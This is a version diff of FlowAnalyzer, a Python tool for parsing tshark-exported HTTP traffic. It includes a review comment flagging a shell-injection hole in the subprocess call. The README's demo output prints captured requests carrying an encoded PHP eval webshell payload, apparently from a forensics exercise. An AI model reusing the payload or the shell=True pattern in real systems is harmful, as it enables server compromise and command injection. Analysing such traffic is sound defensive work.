FlowAnalyzer 0.2.9__tar.gz → 0.3.2__tar.gz
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/FlowAnalyzer/FlowAnalyzer.py +67 -47
- flowanalyzer-0.3.2/FlowAnalyzer.egg-info/PKG-INFO +84 -0
- flowanalyzer-0.3.2/PKG-INFO +84 -0
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/setup.py +1 -1
- FlowAnalyzer-0.2.9/FlowAnalyzer.egg-info/PKG-INFO +0 -85
- FlowAnalyzer-0.2.9/PKG-INFO +0 -85
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/FlowAnalyzer/__init__.py +0 -0
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/FlowAnalyzer/logging_config.py +0 -0
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/FlowAnalyzer.egg-info/SOURCES.txt +0 -0
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/FlowAnalyzer.egg-info/dependency_links.txt +0 -0
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/FlowAnalyzer.egg-info/top_level.txt +0 -0
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/LICENSE +0 -0
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/README.md +0 -0
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/setup.cfg +0 -0
|
@@ -13,20 +13,21 @@ from .logging_config import configure_logger
|
|
|
13
13
|
|
|
14
14
|
logger = configure_logger("FlowAnalyzer", logging.INFO)
|
|
15
15
|
|
|
16
|
+
|
|
16
17
|
class Request(NamedTuple):
|
|
17
|
-
frame_num:
|
|
18
|
+
frame_num: int
|
|
18
19
|
header: bytes
|
|
19
20
|
file_data: bytes
|
|
20
|
-
full_uri:
|
|
21
|
-
time_epoch:
|
|
21
|
+
full_uri: str
|
|
22
|
+
time_epoch: float
|
|
22
23
|
|
|
23
24
|
|
|
24
25
|
class Response(NamedTuple):
|
|
25
|
-
frame_num:
|
|
26
|
+
frame_num: int
|
|
26
27
|
header: bytes
|
|
27
28
|
file_data: bytes
|
|
28
|
-
request_in:
|
|
29
|
-
time_epoch:
|
|
29
|
+
request_in: int
|
|
30
|
+
time_epoch: float
|
|
30
31
|
|
|
31
32
|
|
|
32
33
|
class HttpPair(NamedTuple):
|
|
@@ -65,6 +66,37 @@ class FlowAnalyzer:
|
|
|
65
66
|
if os.path.getsize(self.jsonPath) == 0:
|
|
66
67
|
raise ValueError("您的tshark导出的JSON文件内容为空!JSON路径:%s" % self.jsonPath)
|
|
67
68
|
|
|
69
|
+
def parse_packet(self, packet: dict) -> Tuple[int, int, float, str, str]:
|
|
70
|
+
"""解析Json中的关键信息字段
|
|
71
|
+
|
|
72
|
+
Parameters
|
|
73
|
+
----------
|
|
74
|
+
packet : dict
|
|
75
|
+
传入Json字典
|
|
76
|
+
|
|
77
|
+
Returns
|
|
78
|
+
-------
|
|
79
|
+
Tuple[int, int, float, str, str]
|
|
80
|
+
frame_num, request_in, time_epoch, full_uri, full_request
|
|
81
|
+
"""
|
|
82
|
+
# frame_num = int(packet["frame.number"][0]) if packet.get("frame.number") else None
|
|
83
|
+
# time_epoch = float(packet["frame.time_epoch"][0]) if packet.get("frame.time_epoch") else None
|
|
84
|
+
# full_uri = parse.unquote(packet["http.request.full_uri"][0]) if packet.get("http.request.full_uri") else None
|
|
85
|
+
|
|
86
|
+
frame_num = int(packet["frame.number"][0])
|
|
87
|
+
request_in = int(packet["http.request_in"][0]) if packet.get("http.request_in") else frame_num
|
|
88
|
+
full_uri = parse.unquote(packet["http.request.full_uri"][0])
|
|
89
|
+
time_epoch = packet["frame.time_epoch"][0]
|
|
90
|
+
|
|
91
|
+
if packet.get("tcp.reassembled.data"):
|
|
92
|
+
full_request = packet["tcp.reassembled.data"][0]
|
|
93
|
+
elif packet.get("tcp.payload"):
|
|
94
|
+
full_request = packet["tcp.payload"][0]
|
|
95
|
+
else:
|
|
96
|
+
# exported_pdu.exported_pdu
|
|
97
|
+
full_request = packet["exported_pdu.exported_pdu"][0]
|
|
98
|
+
return frame_num, request_in, time_epoch, full_uri, full_request
|
|
99
|
+
|
|
68
100
|
def parse_http_json(self) -> Tuple[Dict[int, Request], Dict[int, Response]]:
|
|
69
101
|
# sourcery skip: use-named-expression
|
|
70
102
|
"""解析JSON数据文件中的HTTP请求和响应信息
|
|
@@ -80,22 +112,7 @@ class FlowAnalyzer:
|
|
|
80
112
|
requests, responses = {}, {}
|
|
81
113
|
for packet in data:
|
|
82
114
|
packet = packet["_source"]["layers"]
|
|
83
|
-
|
|
84
|
-
|
|
85
|
-
if packet.get("tcp.reassembled.data"):
|
|
86
|
-
full_request = packet["tcp.reassembled.data"][0]
|
|
87
|
-
elif packet.get("tcp.payload"):
|
|
88
|
-
full_request = packet["tcp.payload"][0]
|
|
89
|
-
else:
|
|
90
|
-
# exported_pdu.exported_pdu
|
|
91
|
-
full_request = packet["exported_pdu.exported_pdu"][0]
|
|
92
|
-
|
|
93
|
-
frame_num = int(packet["frame.number"][0]) if packet.get("frame.number") else None
|
|
94
|
-
request_in = int(packet["http.request_in"][0]) if packet.get("http.request_in") else frame_num
|
|
95
|
-
full_uri = (
|
|
96
|
-
parse.unquote(packet["http.request.full_uri"][0]) if packet.get("http.request.full_uri") else None
|
|
97
|
-
)
|
|
98
|
-
|
|
115
|
+
frame_num, request_in, time_epoch, full_uri, full_request = self.parse_packet(packet)
|
|
99
116
|
header, file_data = self.extract_http_file_data(full_request)
|
|
100
117
|
|
|
101
118
|
if packet.get("http.response_number"):
|
|
@@ -145,24 +162,35 @@ class FlowAnalyzer:
|
|
|
145
162
|
def extract_json_file(fileName: str, display_filter: str, tshark_workDir: str) -> None:
|
|
146
163
|
# sourcery skip: replace-interpolation-with-fstring, use-fstring-for-formatting
|
|
147
164
|
# tshark -r {} -Y "{}" -T json -e http.request_number -e http.response_number -e http.request_in -e tcp.reassembled.data -e frame.number -e tcp.payload -e frame.time_epoch -e http.request.full_uri > output.json
|
|
148
|
-
|
|
149
|
-
|
|
150
|
-
|
|
151
|
-
|
|
152
|
-
|
|
153
|
-
|
|
154
|
-
|
|
155
|
-
|
|
156
|
-
|
|
157
|
-
|
|
158
|
-
|
|
159
|
-
|
|
160
|
-
|
|
161
|
-
))
|
|
165
|
+
|
|
166
|
+
command = [
|
|
167
|
+
"tshark", "-r", fileName,
|
|
168
|
+
"-Y", f"(tcp.reassembled_in) or ({display_filter})",
|
|
169
|
+
"-T", "json",
|
|
170
|
+
"-e", "http.request_number", "-e", "http.response_number", "-e", "http.request_in",
|
|
171
|
+
"-e", "tcp.reassembled.data", "-e", "frame.number", "-e", "tcp.payload",
|
|
172
|
+
"-e", "frame.time_epoch",
|
|
173
|
+
"-e", "exported_pdu.exported_pdu",
|
|
174
|
+
"-e", "http.request.full_uri",
|
|
175
|
+
">", "output.json",
|
|
176
|
+
]
|
|
177
|
+
|
|
162
178
|
_, stderr = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=tshark_workDir).communicate()
|
|
163
179
|
if stderr != b"" and b"WARNING" not in stderr:
|
|
164
180
|
print(f"[Waring/Error]: {stderr}")
|
|
165
181
|
|
|
182
|
+
@staticmethod
|
|
183
|
+
def move_and_addMD5Sum(tshark_jsonPath: str, jsonWordPath: str, MD5Sum: str) -> None:
|
|
184
|
+
if tshark_jsonPath != jsonWordPath:
|
|
185
|
+
shutil.move(tshark_jsonPath, jsonWordPath)
|
|
186
|
+
|
|
187
|
+
with open(jsonWordPath, "r", encoding="utf-8") as f:
|
|
188
|
+
data = json.load(f)
|
|
189
|
+
data[0]["MD5Sum"] = MD5Sum
|
|
190
|
+
|
|
191
|
+
with open(jsonWordPath, "w", encoding="utf-8") as f:
|
|
192
|
+
json.dump(data, f, indent=2)
|
|
193
|
+
|
|
166
194
|
@staticmethod
|
|
167
195
|
def get_json_data(filePath: str, display_filter: str) -> str:
|
|
168
196
|
# sourcery skip: replace-interpolation-with-fstring
|
|
@@ -193,20 +221,12 @@ class FlowAnalyzer:
|
|
|
193
221
|
if os.path.exists(jsonWordPath):
|
|
194
222
|
with open(jsonWordPath, "r", encoding="utf-8") as f:
|
|
195
223
|
data = json.load(f)
|
|
196
|
-
if data[0].get(
|
|
224
|
+
if data[0].get("MD5Sum") == MD5Sum:
|
|
197
225
|
logger.debug("匹配HASH校验无误,自动返回Json文件路径!")
|
|
198
226
|
return jsonWordPath
|
|
199
|
-
FlowAnalyzer.extract_json_file(fileName, display_filter, tshark_workDir)
|
|
200
227
|
|
|
201
|
-
|
|
202
|
-
|
|
203
|
-
|
|
204
|
-
with open(jsonWordPath, "r", encoding="utf-8") as f:
|
|
205
|
-
data = json.load(f)
|
|
206
|
-
data[0]['MD5Sum'] = MD5Sum
|
|
207
|
-
|
|
208
|
-
with open(jsonWordPath, "w", encoding="utf-8") as f:
|
|
209
|
-
json.dump(data, f, indent=2)
|
|
228
|
+
FlowAnalyzer.extract_json_file(fileName, display_filter, tshark_workDir)
|
|
229
|
+
FlowAnalyzer.move_and_addMD5Sum(tshark_jsonPath, jsonWordPath, MD5Sum)
|
|
210
230
|
return jsonWordPath
|
|
211
231
|
|
|
212
232
|
def Split_HTTP_headers(self, file_data: bytes) -> Tuple[bytes, bytes]:
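Review bot: In extract_json_file (hunk `@@ -145,24 +162,35 @@`) the command is now a list but is still run with `shell=True`, so the `">", "output.json"` redirect only works where Python flattens the list into a single cmd.exe command line; on POSIX `sh -c tshark` receives the remaining elements as positional parameters rather than as tshark arguments. Either way `fileName` and `display_filter` are still interpolated into a shell-parsed command line, so a crafted capture path or filter containing quote or `&` metacharacters can run arbitrary commands, and the exit status is never checked, so a failed tshark run leaves a missing or empty output.json for move_and_addMD5Sum to trip over. Drop `shell=True` and the two redirect entries, hand tshark's stdout to a file object opened by Python, and fail on a non-zero return code, as sketched below (the output path should match whatever get_json_data passes as tshark_jsonPath, which is outside this hunk). Separately, parse_packet now indexes `packet["http.request.full_uri"]` unguarded where 0.2.9 fell back to None; frames selected only by `tcp.reassembled_in` would not seem to carry that field, so this looks like a KeyError regression worth re-guarding with `.get()`.
```python
        # … unchanged: command list, minus the trailing ">", "output.json" entries …
        out_path = os.path.join(tshark_workDir, "output.json")
        with open(out_path, "wb") as out:
            proc = subprocess.run(command, stdout=out, stderr=subprocess.PIPE, cwd=tshark_workDir)
        stderr = proc.stderr
        if proc.returncode != 0:
            raise RuntimeError(f"tshark failed ({proc.returncode}): {stderr.decode(errors='replace')}")
        if stderr != b"" and b"WARNING" not in stderr:
            print(f"[Waring/Error]: {stderr}")
```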
|
|
@@ -0,0 +1,84 @@
|
|
|
1
|
+
Metadata-Version: 2.1
|
|
2
|
+
Name: FlowAnalyzer
|
|
3
|
+
Version: 0.3.2
|
|
4
|
+
Summary: FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件
|
|
5
|
+
Home-page: https://github.com/Byxs20/FlowAnalyzer
|
|
6
|
+
Author: Byxs20
|
|
7
|
+
Author-email: 97766819@qq.com
|
|
8
|
+
Classifier: Development Status :: 3 - Alpha
|
|
9
|
+
Classifier: Intended Audience :: Developers
|
|
10
|
+
Classifier: License :: OSI Approved :: MIT License
|
|
11
|
+
Classifier: Programming Language :: Python :: 3
|
|
12
|
+
Classifier: Programming Language :: Python :: 3.6
|
|
13
|
+
Classifier: Programming Language :: Python :: 3.7
|
|
14
|
+
Classifier: Programming Language :: Python :: 3.8
|
|
15
|
+
Classifier: Programming Language :: Python :: 3.9
|
|
16
|
+
Description-Content-Type: text/markdown
|
|
17
|
+
License-File: LICENSE
|
|
18
|
+
|
|
19
|
+
# FlowAnalyzer
|
|
20
|
+
|
|
21
|
+
# Installation
|
|
22
|
+
|
|
23
|
+
Install the package using pip:
|
|
24
|
+
|
|
25
|
+
```
|
|
26
|
+
pip3 install FlowAnalyzer
|
|
27
|
+
```
|
|
28
|
+
|
|
29
|
+
```
|
|
30
|
+
pip3 install FlowAnalyzer -i https://pypi.org/simple
|
|
31
|
+
```
|
|
32
|
+
|
|
33
|
+
# Usage
|
|
34
|
+
|
|
35
|
+
请务必添加 `tshark.exe` 到环境变量,否则找不到会出错!
|
|
36
|
+
|
|
37
|
+
```
|
|
38
|
+
$ git clone https://github.com/Byxs20/FlowAnalyzer.git
|
|
39
|
+
$ cd ./FlowAnalyzer/
|
|
40
|
+
```
|
|
41
|
+
|
|
42
|
+
```python
|
|
43
|
+
# sourcery skip: use-fstring-for-formatting
|
|
44
|
+
import os
|
|
45
|
+
from FlowAnalyzer import FlowAnalyzer
|
|
46
|
+
|
|
47
|
+
|
|
48
|
+
baseDir = os.path.dirname(os.path.abspath(__file__))
|
|
49
|
+
flowPath = os.path.join(baseDir, "flow.pcapng")
|
|
50
|
+
display_filter = "(http.request and urlencoded-form) or (http.request and data-text-lines) or (http.request and mime_multipart) or (http.response.code == 200 and data-text-lines)"
|
|
51
|
+
|
|
52
|
+
jsonPath = FlowAnalyzer.get_json_data(flowPath, display_filter=display_filter)
|
|
53
|
+
for count, http in enumerate(FlowAnalyzer(jsonPath).generate_http_dict_pairs(), start=1):
|
|
54
|
+
print(f"[+] 正在处理第{count}个HTTP流!")
|
|
55
|
+
|
|
56
|
+
request, response = http.request, http.response
|
|
57
|
+
if request:
|
|
58
|
+
request_num, header, file_data, time_epoch = request.frame_num, request.header, request.file_data, request.time_epoch
|
|
59
|
+
print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(request_num, header, file_data, time_epoch))
|
|
60
|
+
|
|
61
|
+
if response:
|
|
62
|
+
response_num, header, file_data, time_epoch = response.frame_num, response.header, response.file_data, response.time_epoch
|
|
63
|
+
print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(response_num, header, file_data, time_epoch))
|
|
64
|
+
```
|
|
65
|
+
|
|
66
|
+
```
|
|
67
|
+
$ python3 .\tests\demo.py
|
|
68
|
+
[+] 正在处理第1个HTTP流!
|
|
69
|
+
序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1403', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%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%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1YCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOQNpHlpcBNa5IHIHHrIHEy7jch%2Fv3Z2Y0lq8qSQQkYhwWZhxVpNq1liOGE%3D', 时间: 1682596262.982344
|
|
70
|
+
序号: 3请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:02 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'70\r\n72a9c691ccdaab98fL1tMGI4YTljMh76GrwuHij67J+qF+t2KR17BwHlSvtL1mdSPnoksIZRS0N0Xi89+zNlNaUo+3xjMTU=b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596262.992406
|
|
71
|
+
[+] 正在处理第2个HTTP流!
|
|
72
|
+
序号: 5请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1409', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%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%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1cCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOTReMrqj%2Fx6aH4XU%2BWInBcrzUhN6o%2FMfL54MmpIY6avwUcSIJBkZUuq7rVUYzE1', 时间: 1682596266.652869
|
|
73
|
+
序号: 6请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:06 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'40\r\n72a9c691ccdaab98fL1tMGI4YTljMh4dHdNjM6AJ3DZmOGE5b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596266.661427
|
|
74
|
+
[+] 正在处理第3个HTTP流!
|
|
75
|
+
序号: 8请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1427', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTL1ACWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOSdqCqaPC9ZW7GI7C2kIPd0MqlXzqT3svOl%2B1gNW3x0TL4%2BUQ0cdgeygrWzt1XSzu7opY93Nvl1tILnOWMx', 时间: 1682596308.573707
|
|
76
|
+
序号: 9请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:48 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'50\r\n72a9c691ccdaab98fL1tMGI4YTljMn75e3jORcmaTQZQeEdS2jE3TKPMeDNjNg==b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596308.582312
|
|
77
|
+
```
|
|
78
|
+
|
|
79
|
+
# Contributing
|
|
80
|
+
Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
|
|
81
|
+
|
|
82
|
+
# License
|
|
83
|
+
|
|
84
|
+
This project is licensed under the [MIT License.](LICENSE)
|
|
@@ -0,0 +1,84 @@
|
|
|
1
|
+
Metadata-Version: 2.1
|
|
2
|
+
Name: FlowAnalyzer
|
|
3
|
+
Version: 0.3.2
|
|
4
|
+
Summary: FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件
|
|
5
|
+
Home-page: https://github.com/Byxs20/FlowAnalyzer
|
|
6
|
+
Author: Byxs20
|
|
7
|
+
Author-email: 97766819@qq.com
|
|
8
|
+
Classifier: Development Status :: 3 - Alpha
|
|
9
|
+
Classifier: Intended Audience :: Developers
|
|
10
|
+
Classifier: License :: OSI Approved :: MIT License
|
|
11
|
+
Classifier: Programming Language :: Python :: 3
|
|
12
|
+
Classifier: Programming Language :: Python :: 3.6
|
|
13
|
+
Classifier: Programming Language :: Python :: 3.7
|
|
14
|
+
Classifier: Programming Language :: Python :: 3.8
|
|
15
|
+
Classifier: Programming Language :: Python :: 3.9
|
|
16
|
+
Description-Content-Type: text/markdown
|
|
17
|
+
License-File: LICENSE
|
|
18
|
+
|
|
19
|
+
# FlowAnalyzer
|
|
20
|
+
|
|
21
|
+
# Installation
|
|
22
|
+
|
|
23
|
+
Install the package using pip:
|
|
24
|
+
|
|
25
|
+
```
|
|
26
|
+
pip3 install FlowAnalyzer
|
|
27
|
+
```
|
|
28
|
+
|
|
29
|
+
```
|
|
30
|
+
pip3 install FlowAnalyzer -i https://pypi.org/simple
|
|
31
|
+
```
|
|
32
|
+
|
|
33
|
+
# Usage
|
|
34
|
+
|
|
35
|
+
请务必添加 `tshark.exe` 到环境变量,否则找不到会出错!
|
|
36
|
+
|
|
37
|
+
```
|
|
38
|
+
$ git clone https://github.com/Byxs20/FlowAnalyzer.git
|
|
39
|
+
$ cd ./FlowAnalyzer/
|
|
40
|
+
```
|
|
41
|
+
|
|
42
|
+
```python
|
|
43
|
+
# sourcery skip: use-fstring-for-formatting
|
|
44
|
+
import os
|
|
45
|
+
from FlowAnalyzer import FlowAnalyzer
|
|
46
|
+
|
|
47
|
+
|
|
48
|
+
baseDir = os.path.dirname(os.path.abspath(__file__))
|
|
49
|
+
flowPath = os.path.join(baseDir, "flow.pcapng")
|
|
50
|
+
display_filter = "(http.request and urlencoded-form) or (http.request and data-text-lines) or (http.request and mime_multipart) or (http.response.code == 200 and data-text-lines)"
|
|
51
|
+
|
|
52
|
+
jsonPath = FlowAnalyzer.get_json_data(flowPath, display_filter=display_filter)
|
|
53
|
+
for count, http in enumerate(FlowAnalyzer(jsonPath).generate_http_dict_pairs(), start=1):
|
|
54
|
+
print(f"[+] 正在处理第{count}个HTTP流!")
|
|
55
|
+
|
|
56
|
+
request, response = http.request, http.response
|
|
57
|
+
if request:
|
|
58
|
+
request_num, header, file_data, time_epoch = request.frame_num, request.header, request.file_data, request.time_epoch
|
|
59
|
+
print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(request_num, header, file_data, time_epoch))
|
|
60
|
+
|
|
61
|
+
if response:
|
|
62
|
+
response_num, header, file_data, time_epoch = response.frame_num, response.header, response.file_data, response.time_epoch
|
|
63
|
+
print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(response_num, header, file_data, time_epoch))
|
|
64
|
+
```
|
|
65
|
+
|
|
66
|
+
```
|
|
67
|
+
$ python3 .\tests\demo.py
|
|
68
|
+
[+] 正在处理第1个HTTP流!
|
|
69
|
+
序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1403', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%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%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1YCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOQNpHlpcBNa5IHIHHrIHEy7jch%2Fv3Z2Y0lq8qSQQkYhwWZhxVpNq1liOGE%3D', 时间: 1682596262.982344
|
|
70
|
+
序号: 3请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:02 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'70\r\n72a9c691ccdaab98fL1tMGI4YTljMh76GrwuHij67J+qF+t2KR17BwHlSvtL1mdSPnoksIZRS0N0Xi89+zNlNaUo+3xjMTU=b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596262.992406
|
|
71
|
+
[+] 正在处理第2个HTTP流!
|
|
72
|
+
序号: 5请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1409', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%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%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1cCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOTReMrqj%2Fx6aH4XU%2BWInBcrzUhN6o%2FMfL54MmpIY6avwUcSIJBkZUuq7rVUYzE1', 时间: 1682596266.652869
|
|
73
|
+
序号: 6请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:06 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'40\r\n72a9c691ccdaab98fL1tMGI4YTljMh4dHdNjM6AJ3DZmOGE5b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596266.661427
|
|
74
|
+
[+] 正在处理第3个HTTP流!
|
|
75
|
+
